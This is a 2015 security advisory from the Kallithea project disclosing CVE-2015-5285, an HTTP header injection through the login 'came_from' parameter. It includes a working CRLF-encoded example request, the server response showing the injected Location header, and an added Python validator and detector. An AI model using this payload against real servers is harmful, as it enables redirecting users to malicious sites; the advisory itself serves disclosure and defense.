[SECURITY ISSUE] CVE-2015-5285: HTTP header injection
Andrew Shadura
andrew at shadura.me
Fri Oct 2 20:19:16 UTC 2015
HTTP header injection
Synopsis
========
A vulnerability has been found in Kallithea, allowing attackers to inject
arbitrary headers into the server response for certain URLs.
Description
===========
HTTP header injection was possible in login-related code of Kallithea, allowing
attackers to inject arbitrary headers into the server responses.
The vulnerability affects the `came_from` `GET` parameter.
Example of a malicious request:
GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438
Corresponding response:
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress
<html>
<head>
<title>302 Found</title>
</head>
<body>
<h1>302 Found</h1>
The resource was found at <a href="http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk </a>;
you should be redirected automatically.
</body>
</html>
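As an added example (not Kallithea's code and not the project's fix), the check below shows the defensive handling the request above calls for: the decoded `came_from` value is refused if it carries any control character, so CR/LF can never reach a Location header, and a small detector flags request lines with that pattern for log review. The same-origin-path rule, the function names and the constructed SAMPLE_REQUEST_LINE are assumptions, not part of the advisory.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample modelled on the request line in this advisory.
SAMPLE_REQUEST_LINE = (
    "GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk"
    "%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1"
)

# No ASCII control character (CR, LF, NUL, \x01, ...) belongs in a header value.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def came_from_values(request_line):
    """Return the percent-decoded came_from values found in an HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    values = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == "came_from":
            values.append(unquote(value))
    return values


def safe_came_from(raw, default="/"):
    """Return a redirect target that is safe to emit in a Location header.

    Control characters are checked on the decoded value *before* any URL
    parsing (urlsplit silently strips CR/LF, which would mask an injection).
    Only same-origin absolute paths are accepted (hypothetical policy);
    absolute URLs and protocol-relative forms fall back to `default`.
    """
    if raw is None:
        return default
    value = unquote(raw)
    if _CONTROL_CHARS.search(value):
        return default
    if not value.startswith("/") or value[1:2] in ("/", "\\"):
        return default
    return value


def flags_header_injection(request_line):
    """True when a came_from value in the request line carries a control
    character, the signature of the request shown in this advisory."""
    return any(_CONTROL_CHARS.search(v) for v in came_from_values(request_line))
```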
Impact
======
The bug allows an attacker to override important response headers, possibly
redirecting users to a malicious website or making other middleware that trusts
the response headers misbehave.
Resolution
==========
The Kallithea project has fixed this issue in the stable branch. Users are
recommended to upgrade to the latest 0.3 release.
Affected versions
=================
The issue is present in Kallithea versions before 0.3.
Acknowledgments
===============
Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.
References
==========
[1] CVE-2015-5285
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>
[2] Kallithea: Security Notice CVE-2015-5285
<https://kallithea-scm.org/security/cve-2015-5285.html>
[3] Mercurial changeset fixing the issue
<https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>
[4] Zero Science Lab
<http://www.zeroscience.mk/en/>
--
Cheers,
Andrew Shadura
on behalf of Kallithea Security Team